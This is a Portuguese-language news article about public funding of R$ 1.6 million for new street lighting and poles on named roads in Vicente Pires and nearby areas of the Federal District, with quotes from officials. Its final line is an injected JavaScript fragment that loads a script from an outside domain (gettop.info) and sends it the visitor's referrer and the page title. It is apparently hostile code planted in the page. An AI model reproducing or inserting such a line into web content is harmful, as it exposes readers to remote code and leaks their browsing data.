A partir de março, vias de Vicente Pires, do Setor Habitacional Vicente Pires, do Jóquei e da Colônia Agrícola Samambaia receberão reforço na iluminação. O benefício é um pedido antigo da população e envolverá desde trocas de lâmpadas a instalação de novos postes de concreto.
Para possibilitar as obras, uma portaria publicada nesta quinta-feira (16) no Diário Oficial do Distrito Federal autoriza a descentralização de R$ 1.628.877,98 da Secretaria de Infraestrutura e Serviços Públicos para a Administração Regional de Vicente Pires. O serviço será executado pela Companhia Energética de Brasília (CEB).
Para o secretário de Infraestrutura e Serviços Públicos, Antonio Coimbra, a notícia representa, entre outras coisas, mais segurança para quem vive nos locais. “Uma rua mais iluminada resulta em menos furtos e homicídios, além de facilitar o acesso das polícias.” Em algumas ruas, como na 1B do Jockey, a iluminação já foi feita.
Em alguns pontos, a Companhia Urbanizadora da Nova Capital do Brasil (Novacap) iniciou um trabalho de poda de árvores e preparação do terreno para receber o serviço. “Ampliar a iluminação pública nestas áreas faz parte do projeto de melhoria da cidade como um todo, em benefício da qualidade de vida dos moradores”, destaca o administrador interino de Vicente Pires, Júlio Menegotto.
As vias contempladas são as Ruas 2, 7 e 10 de Vicente Pires; 6, 7, 8, 10 e 12 do Setor Habitacional Vicente Pires; 1B da região do Jóquei; além das Chácaras 122 (Rua 10) e 123 (da Colônia Agrícola Samambaia).
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;